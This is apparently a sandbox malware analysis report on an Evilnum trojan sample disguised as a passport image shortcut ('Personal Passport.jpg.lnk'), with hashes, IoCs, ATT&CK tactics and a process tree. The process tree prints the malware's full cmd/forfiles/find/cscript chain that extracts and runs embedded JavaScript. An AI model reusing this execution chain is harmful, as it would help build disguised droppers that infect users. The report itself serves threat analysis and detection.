evilnum | 04f1fce5628ec0cff7f616a37d11bb7498974522e5400bb5a2059dd00e0d0100

Analysis

max time kernel
163s
max time network
182s
platform
windows7_x64
resource
win7-en-20211208
submitted
04-02-2022 08:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Personal Passport.jpg.lnk
Size

134KB
MD5

25d6eeba718af78275f2c9a4a58cd8b2
SHA1

97820a79fd43f664f553c46dca682bce135b2cc3
SHA256

e7510a4f5a90271f278970a8cb62d116b15ff08884c072ef44e419f896d65237
SHA512

6f213fb85e5f5f37e5f80e94625dfb04df2eb8682df9dffd2b045ac376a8fdd8a5d97f6f8eda8453fea2adbc1799ae0f9247ad09a2baac9d7c9654cdab4d770e

Score

10^/10

evilnum trojan

Malware Config

Signatures

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum

Blocklisted process makes network request 40 IoCs

flow	pid	Process
3	432	cscript.exe
4	432	cscript.exe
5	432	cscript.exe
7	432	cscript.exe
8	432	cscript.exe
11	432	cscript.exe
12	432	cscript.exe
13	432	cscript.exe
14	432	cscript.exe
15	432	cscript.exe
16	432	cscript.exe
18	432	cscript.exe
19	432	cscript.exe
20	432	cscript.exe
22	432	cscript.exe
23	432	cscript.exe
24	432	cscript.exe
25	432	cscript.exe
26	432	cscript.exe
27	432	cscript.exe
28	432	cscript.exe
29	432	cscript.exe
30	432	cscript.exe
32	432	cscript.exe
33	432	cscript.exe
34	432	cscript.exe
35	432	cscript.exe
36	432	cscript.exe
37	432	cscript.exe
38	432	cscript.exe
39	432	cscript.exe
40	432	cscript.exe
41	432	cscript.exe
42	432	cscript.exe
43	432	cscript.exe
44	432	cscript.exe
45	432	cscript.exe
46	432	cscript.exe
48	432	cscript.exe
49	432	cscript.exe

Deletes itself 1 IoCs

pid	Process
1884	cscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
964	cmd.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1460 wrote to memory of 964	1460	cmd.exe	28
PID 1460 wrote to memory of 964	1460	cmd.exe	28
PID 1460 wrote to memory of 964	1460	cmd.exe	28
PID 964 wrote to memory of 904	964	cmd.exe	29
PID 964 wrote to memory of 904	964	cmd.exe	29
PID 964 wrote to memory of 904	964	cmd.exe	29
PID 964 wrote to memory of 1708	964	cmd.exe	30
PID 964 wrote to memory of 1708	964	cmd.exe	30
PID 964 wrote to memory of 1708	964	cmd.exe	30
PID 964 wrote to memory of 1508	964	cmd.exe	31
PID 964 wrote to memory of 1508	964	cmd.exe	31
PID 964 wrote to memory of 1508	964	cmd.exe	31
PID 964 wrote to memory of 1560	964	cmd.exe	32
PID 964 wrote to memory of 1560	964	cmd.exe	32
PID 964 wrote to memory of 1560	964	cmd.exe	32
PID 964 wrote to memory of 1884	964	cmd.exe	33
PID 964 wrote to memory of 1884	964	cmd.exe	33
PID 964 wrote to memory of 1884	964	cmd.exe	33
PID 1884 wrote to memory of 1380	1884	cscript.exe	35
PID 1884 wrote to memory of 1380	1884	cscript.exe	35
PID 1884 wrote to memory of 1380	1884	cscript.exe	35
PID 1380 wrote to memory of 432	1380	cscript.exe	37
PID 1380 wrote to memory of 432	1380	cscript.exe	37
PID 1380 wrote to memory of 432	1380	cscript.exe	37

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Personal Passport.jpg.lnk"
1⤵
- Suspicious use of WriteProcessMemory
PID:1460
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Personal Passport.jpg*lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Pers*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "RDE3">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cScrIPt "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious behavior: RenamesItself
  - Suspicious use of WriteProcessMemory
  PID:964
- - C:\Windows\system32\forfiles.exe
    forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Pers*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
    3⤵
    PID:904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:1708
- - C:\Windows\system32\find.exe
    find "RDE3"
    3⤵
    PID:1508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" rd a"
    3⤵
    PID:1560
- - C:\Windows\system32\cscript.exe
    cScrIPt "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    - Deletes itself
    - Suspicious use of WriteProcessMemory
    PID:1884
  - - C:\Windows\System32\cscript.exe
      "C:\Windows\System32\cscript.exe" C:\Users\Admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.js
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1380
    - - C:\Windows\System32\cscript.exe
        
        "C:\Windows\System32\cscript.exe" C:\Users\Admin\AppData\Local\Temp\reportapi.js
        5⤵
        Blocklisted process makes network request
        
        PID:432

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1460-54-0x000007FEFC3C1000-0x000007FEFC3C3000-memory.dmp

Filesize
8KB

Download